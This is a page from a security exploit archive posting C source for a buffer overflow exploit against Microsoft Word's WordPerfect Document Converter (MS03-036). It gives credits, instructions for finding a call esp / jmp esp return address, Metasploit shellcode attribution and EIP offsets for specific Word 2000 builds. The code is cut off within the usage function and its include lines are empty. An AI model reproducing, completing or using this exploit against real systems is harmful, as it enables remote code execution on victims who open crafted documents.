Microsoft WordPerfect Document Converter Exploit (MS03-036)

    
 
     * word.cpp + findhex.cpp (ZIP) *
/******************************************************************/
                              /*   Microsoft WordPerfect Document Converter Buffer Overflow Exploit MS03-036    */
                              /*                                                                                                                */
                              /*                                  Exploit with several targets                                         */
                              /*                                                                                                                */
                              /*        Find your own return address with :                                                       */
                              /*            findhex dllname FF D4 (call esp)                                                      */
                              /*            findhex dllname FF E4 (jmp esp)                                                      */
                              /*                                                                                                                */
                              /* Credits :                                                                                                   */
                              /* vulnerability : Yuji "The Ninja" Ukai                                                              */
                              /* findhex : Jason Jordan                                                                               */
                              /* sk scan-associates.net                                                                               */
                              /* shellcode : metasploit                                                                                */
                              /* exploit : valgasu - RstAck                                                                           */
                              /*                                                                                                                */
                              /******************************************************************/


                              #include 
                              #include 
                              #include 
                              #include 
                              #pragma comment(lib,"ws2_32")

                              /* eip offset for Word 2000 9.0.2812 */
                              #define EIP_OFFSET 1359

                              /* eip offset for Word 2000 9.0.4462 SR1 */
                              //#define EIP_OFFSET 1343


                              void usage(char *name)
                              {
                              printf("\n-- --\n");
                              printf("-- WordPerfect Document Converter Exploit --\n");
                              printf("-- --\n\n");
                              printf("Usage: %s  

                              

 Audits de Sécurité & Tests Intrusifs Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits